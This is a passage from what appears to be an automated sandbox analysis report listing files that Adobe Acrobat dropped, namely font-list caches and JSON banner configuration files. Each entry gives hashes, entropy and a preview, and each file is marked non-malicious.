                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10880
                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7448

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10880
                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.3413180255546076
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJM3g98kUwPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGMbLUkee9
                                                                                                                  MD5:E3008F6573FA569F0F5A6431B90D23FE
                                                                                                                  SHA1:9E60978FDB63B1A8EE033F5479045A64FDFBE020
                                                                                                                  SHA-256:C74F64E0F709FD0AB10133F507CA124F5809F4D6DD58B5FAB38D46D87BBA16E2
                                                                                                                  SHA-512:1301D88B8635C004E17BA4AC278EC13FF827418655BFA6F23FE6ECC786989D6501908D7717841A969526EC59A5BE6BBB4F057E2833547AF850B1BD133E5333FF
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.274159630236761
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfBoTfXpnrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGWTfXcUkee9
                                                                                                                  MD5:4BA615D771432FCC7638D14D9B69DE5F
                                                                                                                  SHA1:D341A4146584C21C798B5ADED63D6EDDADEB47FC
                                                                                                                  SHA-256:0C94C44C39D72C65E212F145BA8D2958C0F93E298ED2FB002DEEA539F5C19C80
                                                                                                                  SHA-512:0C558EE03C91026484D096D53E6DCABB262D2FCCA8D98DDCD8F60D3D29F5100F36C7D8A923DD33659AAF25A00D89057AD4C150D207F67C02E923FAC6A9077478
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.253154665631836
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfBD2G6UpnrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGR22cUkee9
                                                                                                                  MD5:6D6F0A21281F25F5ADACAA27451EC313
                                                                                                                  SHA1:FBEA7CEB22E6901D694D2292B45608C5251B398B
                                                                                                                  SHA-256:5A862CDBBAE6DF5E8F49E7E386D11F4151F0EBDD01C2BC6603776F503E839934
                                                                                                                  SHA-512:5269C57369863B56B7AC8C3586C9EBD9CBA167C373CAAA93AFFA4EB69AAE7ACAF32801F87DDF7383E7A7BA2599F8C5845B175C54FBD88F86FBE5D6D08477CECC
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):285
                                                                                                                  Entropy (8bit):5.317493050669637
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfPmwrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGH56Ukee9
                                                                                                                  MD5:F7416BFA5FF61E7BB0A8C476BA0FBF8A
                                                                                                                  SHA1:3184C2B969ACE4B127E769920E375A81831A400C
                                                                                                                  SHA-256:2D7850130D4DEE3AEF40DE0CDB6D1BBC96B3B29F37D33BAB0326E7EF284EF81A
                                                                                                                  SHA-512:033CACD157CCA9CF871B9A1CF6F8002EC121D8DA8352E84CA1890951FDED27A4D418C734C23D703A7DC12C439040A16540CA41026FE21EDDD82F87BE9B37B54D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1123
                                                                                                                  Entropy (8bit):5.686521695390952
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6X+obV2JhipLgE9cQx8LennAvzBvkn0RCmK8czOCCS4:YvgbYJhihgy6SAFv5Ah8cv/4
                                                                                                                  MD5:6C8F5C8CB30EBEECE5B9637FD7E43A83
                                                                                                                  SHA1:4387986A08CD46F0660DCE579BFADFF04BA1DC39
                                                                                                                  SHA-256:6B14C61B2B3BCD00EC26DAD0EC013AA119E0D3D5F25ED93D4AD9F65EF96AC60B
                                                                                                                  SHA-512:2D2DB77C8BAE87DEE3C3A001F22DAD7B45CE0EC6069E29D0CE7E7D9E539D4E1E44912B1835E2C7616B205DD1669F968766BFC9A3B8B0DCFE0C1F357D885D2F76
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.263928691944252
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJf8dPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGU8Ukee9
                                                                                                                  MD5:7889EE9748E9549A76A53DAA9081D816
                                                                                                                  SHA1:F8CFC36399F93E33FDBEC4F9FC74C8CED4ADD20D
                                                                                                                  SHA-256:D8F9D0FDDAEDB56750119EE276FC31894D9B38920FC02162A8DEB25F6567B7B6
                                                                                                                  SHA-512:AC5B06CDAF312343085D77D270FF7CE46E28018B3388180FFBD56F8E2CAC16B837C6C118892D4B436F147479BAE17663E8E172E74BD08EBB83D4A4FBD1B7662D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):292
                                                                                                                  Entropy (8bit):5.2635130408932245
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfQ1rPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGY16Ukee9
                                                                                                                  MD5:AEFD290BCD6C67CC717264954594002C
                                                                                                                  SHA1:1BEFC91D94C04821CEB7D24F38D48EDDD1BEFEA9
                                                                                                                  SHA-256:1F3CD4429083CDC385361B7C180AE96377B003B3BF25B32AB9951696104156B6
                                                                                                                  SHA-512:585C33242D499D2AE95924DFA74468351150ABCB898FE985B770B90BE6541AC27157C8A6C0F328E5392EC3381C5DC5E2CE5A940B7FD235B7DF81741A60DEFD3B
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.277896230546657
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfFldPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGz8Ukee9
                                                                                                                  MD5:CD075AA2FC3B72B68D7AB1C30B14F103
                                                                                                                  SHA1:3D8587F82E7A7F7EB93B3E55C6B63D7BA656FB77
                                                                                                                  SHA-256:BAB685392DB5BCA096A292CA759562246ECD54D603FF3047C58EC1623EEEE1EA
                                                                                                                  SHA-512:25A5C8530A988A9A129F07C842DA536F813971D53427CBCBD6B1DFB540D498445F694EA929D90D94681724A0E699588C07BCA370246E78C90270F8BFFAB9587F
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.291418157334888
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfzdPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGb8Ukee9
                                                                                                                  MD5:AD9C10EC62CC6721585F1635145450D9
                                                                                                                  SHA1:161A2095AF0F4A532D3ACDDC15270FC7DFC5F591
                                                                                                                  SHA-256:7C3139423FAAF6B4CD538248AC390D1490C1CEC60D5C0941A529A91AF74A9FE3
                                                                                                                  SHA-512:9A8E23C0B9E920AEF30E40613431D9296E76127CF82BF88AC9A0F0B8ACAF68769650871797D5E6FD7D52A8960D0976EBE47B2EE91DFBCBD8AC653ABC1A41B92C
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.272271759881581
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfYdPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGg8Ukee9
                                                                                                                  MD5:AC1DB8661D6E6C271DB9FEAAFCE60C44
                                                                                                                  SHA1:A79A10AA935BFB6AA7AF36DE391C238DED99C0BD
                                                                                                                  SHA-256:DA777B6D7B752AC81EF43643CECCBEDECB91DB531DAAB9E760B33C06BCDC052E
                                                                                                                  SHA-512:B041C47C5423B896F7FDEBCBC3D624B08AFC55AA5D5E2CCF34443936CD0C2E1BCE56B59AA8780077FC7E65BB37FD5A8911BDB809DE592EEFFC42EC0982BAB4AA
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):284
                                                                                                                  Entropy (8bit):5.258132950390575
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJf+dPeUkwRe9:YvXKX+obV2vR/ZwHAsoFG28Ukee9
                                                                                                                  MD5:079D58AA24F43A9D585B2D9F1A00147A
                                                                                                                  SHA1:B9C76DD629238F6DE2826455FF8F392E77F08411
                                                                                                                  SHA-256:BB9371D6C6943977C1908A372B483600E7C207091E26668195106DBAC7C1C193
                                                                                                                  SHA-512:BC478F068D4CBAE267ED8750C64E9AD4BBC3EA195BE4F4DF54790BEE9ED7C0A372A7DA445AA9A5E6E80436C9CB8A471372C92360AF392A2D136C49BC99B0A976
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):291
                                                                                                                  Entropy (8bit):5.256009429652479
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfbPtdPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGDV8Ukee9
                                                                                                                  MD5:223737DE51A8E0222D2767CA469D7D63
                                                                                                                  SHA1:711850066D1138AF1097425EAB929AD5F7B9020A
                                                                                                                  SHA-256:EB32BDD5B229BD986371FFB828545F5EF957B8B0FA6DE2D542601A892B02F43E
                                                                                                                  SHA-512:3A3F3323F84AF2B9B652B144818C3017663DA2B9E7E3A1FE34B3258D31BE3F69A5E57229A4F97214D87668461ADE6D160133B0EE2F1ED068EBA7C0E1A9495CE2
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):287
                                                                                                                  Entropy (8bit):5.2555085467296125
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJf21rPeUkwRe9:YvXKX+obV2vR/ZwHAsoFG+16Ukee9
                                                                                                                  MD5:B6837DF65B6C15B402A32C609058B21C
                                                                                                                  SHA1:BB42B4C24AFA400F2C2C49CDDF2661E960D88F68
                                                                                                                  SHA-256:DC309A1B87FE83439445561BD447D87BED5C73B614A45BD530A458B6CF87B915
                                                                                                                  SHA-512:C5D2C58E142D034B13B7A41F2B631EE4B124C74FE8BBE29B5997AC6081D5A14AE4EF1DE918B787ACDF87515A27B52FADF94E40FD33FF866D6D922A5EE91B8BE0
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1090
                                                                                                                  Entropy (8bit):5.663785571168922
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6X+obV2Jh+amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS4:YvgbYJhABgkDMUJUAh8cvM4
                                                                                                                  MD5:A69A16C0D4D8DA8DE509112C8FBFDCE3
                                                                                                                  SHA1:D59DBC6D60B5CB4B21E29E0BBF66DFE8D08B1F25
                                                                                                                  SHA-256:EA4268C5BC25DC51C462118C3A132140C843F10686A9514990DC3D11D2BB1312
                                                                                                                  SHA-512:772D48A8641D316E8F6338ADB5784D17D85FE1D360805B3510873FEA8A97859703FF4BDCC144C78DFC75B7D76C3EEDFCA7834A06B1D7711F68621668E54FF631
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):286
                                                                                                                  Entropy (8bit):5.229176973479029
                                                                                                                  Encrypted:false
